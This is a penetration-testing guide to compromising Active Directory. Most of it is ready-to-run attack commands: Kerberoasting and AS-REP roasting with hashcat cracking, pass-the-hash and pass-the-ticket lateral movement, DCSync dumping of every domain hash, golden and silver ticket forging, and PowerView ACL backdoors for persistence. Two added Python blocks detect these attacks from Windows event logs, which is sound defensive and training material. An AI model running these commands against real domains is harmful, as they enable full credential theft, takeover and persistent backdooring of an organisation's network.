Active Directory Penetration Testing: Kerberoasting, AS-REP Roasting, and DCSync
Active Directory (AD) is the backbone of nearly every enterprise Windows environment, and it remains the most lucrative target during internal penetration tests. Compromising a single domain user credential often opens a path straight to Domain Admin. This guide walks through the full AD attack chain — from initial enumeration to domain dominance.
| Technique | Tool | Privilege Required | Severity | MITRE ATT&CK |
|---|---|---|---|---|
| Kerberoasting | Rubeus / impacket | Domain User | High | T1558.003 |
| AS-REP Roasting | Rubeus / GetNPUsers.py | None | High | T1558.004 |
| Pass the Hash | mimikatz / CrackMapExec | Local Admin | Critical | T1550.002 |
| DCSync | mimikatz | Domain Admin | Critical | T1003.006 |
| BloodHound Enumeration | BloodHound / SharpHound | Domain User | Medium | T1069 |
| Golden Ticket | mimikatz | Domain Admin + KRBTGT | Critical | T1558.001 |
| Silver Ticket | mimikatz | Service Hash | High | T1558.002 |
| LLMNR Poisoning | Responder | Network Access | High | T1557.001 |
Phase 1: Enumeration with BloodHound
Before attacking, you need a map. BloodHound ingests AD data and visualises attack paths to high-value targets. Collect data using SharpHound or the Python collector:
```shell
# Python collector (no agent on target required)
bloodhound-python -u lowpriv -p 'Password123' -d corp.local -c All --zip
```
```powershell
# SharpHound on a domain-joined machine
.\SharpHound.exe -c All --zipfilename loot.zip
```
Once ingested, run the built-in query "Shortest Paths to Domain Admins" to find attack paths. Pay attention to GenericAll, WriteDACL, and ForceChangePassword edges — these are your escalation primitives.
Phase 2: Kerberoasting
Any authenticated domain user can request a Kerberos service ticket (TGS) for any account that has an SPN registered. The ticket is encrypted with a key derived from the service account's password (its NTLM hash when RC4 is negotiated), so it can be taken offline and cracked with hashcat.
```shell
# Request all servicePrincipalName tickets (impacket)
GetUserSPNs.py corp.local/lowpriv:'Password123' -dc-ip 192.168.1.10 -request -outputfile kerberoast.txt
# Crack with hashcat (mode 13100 = Kerberos 5 TGS-REP)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
# Targeted: request ticket for specific account
GetUserSPNs.py corp.local/lowpriv:'Password123' -dc-ip 192.168.1.10 -request-user svc_mssql
```
Focus on service accounts with adminCount=1 or members of privileged groups. Weak passwords on these accounts are extremely common in real engagements.
Phase 3: AS-REP Roasting
Accounts with Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH UAC flag) hand back an AS-REP whose encrypted part is derived from the account's password to anyone who asks. The request needs no credentials, only a list of candidate usernames.
```shell
# No credentials needed — spray the whole domain
GetNPUsers.py corp.local/ -dc-ip 192.168.1.10 -usersfile users.txt -no-pass -format hashcat -outputfile asrep.txt
# Authenticated enumeration (finds affected accounts automatically)
GetNPUsers.py corp.local/lowpriv:'Password123' -dc-ip 192.168.1.10 -request -format hashcat
# Crack with hashcat (mode 18200 = Kerberos 5 AS-REP)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
```
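On the defensive side, both Phase 2 and Phase 3 leave a clear trail on the domain controller: Kerberoasting shows up as bursts of event 4769 with RC4 encryption (0x17) for user-held SPNs, and AS-REP roasting as event 4768 with pre-authentication type 0. The following detection logic is an added example, not code from the original guide; the events are constructed dicts mirroring those event IDs' fields, and the burst threshold and sample values are assumptions.

```python
"""Detect Kerberoasting (4769) and AS-REP roasting (4768) patterns in Security events.
Events are constructed dicts with those event IDs' fields; the RC4 filter is the
standard signal, the threshold and sample values are assumptions, not from the page."""
from collections import defaultdict

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC / RC4-HMAC-EXP: the etype Kerberoast tools request
SPN_BURST_THRESHOLD = 3        # distinct user-account SPNs from one requester (assumed; tune)

def detect_kerberoast(events):
    """Users who requested >= threshold RC4 service tickets for user-account SPNs."""
    spns_by_user = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue
        if e.get("TicketEncryptionType", "").lower() not in RC4_ETYPES:
            continue
        svc = e["ServiceName"]
        # host$ and krbtgt tickets are routine; Kerberoasting targets user-held SPNs
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        spns_by_user[e["TargetUserName"]].add(svc)
    return {u: sorted(s) for u, s in spns_by_user.items() if len(s) >= SPN_BURST_THRESHOLD}

def detect_asrep_roast(events):
    """(source IP, account) for successful TGT requests made without pre-authentication."""
    return sorted({(e["IpAddress"], e["TargetUserName"]) for e in events
                   if e.get("EventID") == 4768 and e.get("PreAuthType") == "0"
                   and e.get("Status") == "0x0"})

def _ev(eid, **fields):  # helper: build a constructed event dict (success status by default)
    return {"EventID": eid, "Status": "0x0", **fields}

SAMPLE_EVENTS = [  # constructed sample log, not real telemetry
    _ev(4769, TargetUserName="lowpriv@CORP.LOCAL", ServiceName="svc_mssql", TicketEncryptionType="0x17"),
    _ev(4769, TargetUserName="lowpriv@CORP.LOCAL", ServiceName="svc_http", TicketEncryptionType="0x17"),
    _ev(4769, TargetUserName="lowpriv@CORP.LOCAL", ServiceName="svc_backup", TicketEncryptionType="0x17"),
    _ev(4769, TargetUserName="lowpriv@CORP.LOCAL", ServiceName="DC01$", TicketEncryptionType="0x17"),
    _ev(4769, TargetUserName="alice@CORP.LOCAL", ServiceName="svc_mssql", TicketEncryptionType="0x12"),
    _ev(4768, TargetUserName="svc_legacy", IpAddress="::ffff:192.168.1.50", PreAuthType="0"),
    _ev(4768, TargetUserName="alice", IpAddress="::ffff:192.168.1.51", PreAuthType="2"),
]

if __name__ == "__main__":
    print(detect_kerberoast(SAMPLE_EVENTS))
    print(detect_asrep_roast(SAMPLE_EVENTS))
```

Accounts that legitimately still use RC4 will add noise to the first rule; the durable fix is to enforce AES on service accounts and re-enable pre-authentication on every account the second rule surfaces.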
Phase 4: Pass-the-Hash Lateral Movement
Once you have an NTLM hash — from credential dumping, responder captures, or Mimikatz — you can authenticate as that user without knowing the plaintext password.
```shell
# USER@TARGET: the account whose NT hash you hold and the host to authenticate to (placeholders)
# psexec — spawns SYSTEM shell via service creation
psexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c corp.local/USER@TARGET
# wmiexec — semi-interactive, less noisy, no service creation
wmiexec.py -hashes :NTLMHASH corp.local/USER@TARGET
# smbexec — executes via SMB without dropping a binary
smbexec.py -hashes :NTLMHASH corp.local/USER@TARGET
# CrackMapExec spray across subnet (local Administrator hash)
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLMHASH --local-auth
```
Phase 5: Pass-the-Ticket
Kerberos tickets (TGT/TGS) can be exported and injected into another session, authenticating as the ticket owner without their password or hash.
```text
# Export tickets from memory (Windows — requires admin/SYSTEM); Mimikatz command
sekurlsa::tickets /export
```
```shell
# Convert the exported .kirbi to a ccache usable on Linux (impacket)
ticketConverter.py ticket.kirbi ticket.ccache
# Inject ticket into current session (Linux)
export KRB5CCNAME=/path/to/ticket.ccache
klist  # verify ticket loaded
# Kerberos auth needs the target's FQDN, not an IP; USER is the ticket owner (placeholders)
wmiexec.py -k -no-pass corp.local/USER@TARGET_FQDN
```
Phase 6: DCSync — Dumping All Hashes
If you control an account with DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges (Domain Admins, Enterprise Admins, or ACL-granted accounts), you can simulate a Domain Controller replication and pull every hash in the domain.
```shell
# Dump all domain hashes via DCSync
secretsdump.py corp.local/Administrator:'Password123'@dc01.corp.local
# Dump only the krbtgt hash (needed for Golden Ticket)
secretsdump.py corp.local/Administrator:'Password123'@dc01.corp.local -just-dc-user krbtgt
# Via hash (PTH), NTDS only
secretsdump.py -hashes :NTLMHASH corp.local/Administrator@dc01.corp.local -just-dc-ntlm
```
Phase 7: Golden and Silver Tickets
With the krbtgt hash, you can forge arbitrary Kerberos TGTs valid for any user, including nonexistent ones. This is a Golden Ticket — your skeleton key to the domain.
```shell
# Golden Ticket (requires krbtgt hash + domain SID)
# Get domain SID
lookupsid.py corp.local/Administrator:'Password123'@dc01.corp.local | grep "Domain SID"
# Forge Golden Ticket with impacket
ticketer.py -nthash KRBTGT_NTLM -domain-sid S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX -domain corp.local fakeadmin
# Silver Ticket — service-specific, harder to detect
# Use the service account hash instead of krbtgt
ticketer.py -nthash SVC_NTLM -domain-sid S-1-5-21-... -domain corp.local -spn cifs/dc01.corp.local Administrator
```
Phase 8: Persistence via ACL Backdoors
Rather than maintaining a malware foothold, backdoor AD itself by granting DCSync rights to a low-privilege account you control. This survives password resets and reboots.
```powershell
# Grant DCSync (replication) rights on the domain head to a compromised low-priv account (PowerView)
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity lowpriv -Rights DCSync
# Grant full control over every protected (adminCount=1) object via AdminSDHolder
# (SDProp re-stamps the AdminSDHolder ACL onto those objects every 60 minutes)
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=corp,DC=local" -PrincipalIdentity lowpriv -Rights All
```
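Both the DCSync in Phase 6 and the ACL backdoor in Phase 8 are visible from the domain controller's Security log: replication is audited as event 4662 carrying the DS-Replication-Get-Changes extended-right GUIDs, and the ACL edits as event 5136 writes to nTSecurityDescriptor on the domain head or AdminSDHolder. The following detection logic is an added example, not code from the original guide; the events are constructed dicts, and DOMAIN_DN and the DC_ACCOUNTS allowlist are assumptions for the page's corp.local lab.

```python
"""Flag DCSync (4662 with replication rights) and ACL backdoors (5136 on AdminSDHolder or
the domain head). Events are constructed dicts; DOMAIN_DN and DC_ACCOUNTS are assumptions."""

REPL_RIGHTS = {  # extended-right GUIDs DCSync needs (well-known AD schema values)
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DN = "DC=corp,DC=local"
WATCHED_DNS = {DOMAIN_DN.lower(), f"CN=AdminSDHolder,CN=System,{DOMAIN_DN}".lower()}
DC_ACCOUNTS = {"DC01$"}  # assumed allowlist: only DC machine accounts may replicate

def _rights_in(text):  # names of replication rights whose GUID appears in a Properties/SDDL string
    t = text.lower()
    return [name for guid, name in REPL_RIGHTS.items() if guid in t]

def detect_dcsync(events):
    """(account, rights) for every 4662 replication access not made by a DC account."""
    hits = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        rights = _rights_in(e.get("Properties", ""))
        if rights and e["SubjectUserName"].upper() not in DC_ACCOUNTS:
            hits.append((e["SubjectUserName"], rights))
    return hits

def detect_acl_backdoor(events):
    """(account, object, rights) for nTSecurityDescriptor writes on watched objects.
    5136 logs a Value Deleted / Value Added pair per write; only the added value
    (OperationType %%14674) is inspected so each change is reported once."""
    hits = []
    for e in events:
        if (e.get("EventID") != 5136 or e.get("OperationType") != "%%14674"
                or e.get("AttributeLDAPDisplayName") != "nTSecurityDescriptor"
                or e.get("ObjectDN", "").lower() not in WATCHED_DNS):
            continue
        rights = _rights_in(e.get("AttributeValue", "")) or ["(other ACE change)"]
        hits.append((e["SubjectUserName"], e["ObjectDN"], rights))
    return hits

GET_CHANGES, GET_CHANGES_ALL = list(REPL_RIGHTS)[:2]
SAMPLE_EVENTS = [  # constructed sample log, not real events
    {"EventID": 4662, "SubjectUserName": "DC01$", "Properties": "{%s}" % GET_CHANGES},
    {"EventID": 4662, "SubjectUserName": "lowpriv", "Properties": "{%s} {%s}" % (GET_CHANGES, GET_CHANGES_ALL)},
    {"EventID": 5136, "SubjectUserName": "lowpriv", "OperationType": "%%14674",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "ObjectDN": DOMAIN_DN,
     "AttributeValue": "O:DAG:DAD:(OA;;CR;%s;;S-1-5-21-1-2-3-1105)" % GET_CHANGES_ALL},
]
```

Event 4662 only records replication access when the domain object carries a SACL auditing Control Access, and 5136 requires Directory Service Changes auditing, so confirm both are enabled before relying on these rules.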
Tooling Reference
- impacket — GetUserSPNs, GetNPUsers, secretsdump, psexec, wmiexec, ticketer
- CrackMapExec / NetExec — SMB/WinRM/LDAP enumeration and lateral movement at scale
- Evil-WinRM — Full-featured WinRM shell: `evil-winrm -i 192.168.1.20 -u Administrator -H NTLMHASH`
- BloodHound + SharpHound — Attack path visualisation
- Mimikatz / pypykatz — In-memory credential extraction
- Rubeus — Kerberos abuse toolkit (Kerberoast, AS-REP, S4U2Self, ticket manipulation)
Use the Active Directory Generator to quickly build AD-specific payloads for your engagement. For lateral movement commands and post-exploitation chains, see our Lateral Movement Techniques guide. DNS enumeration of the domain is often the first step — the Recon Hub covers LDAP and DNS fingerprinting.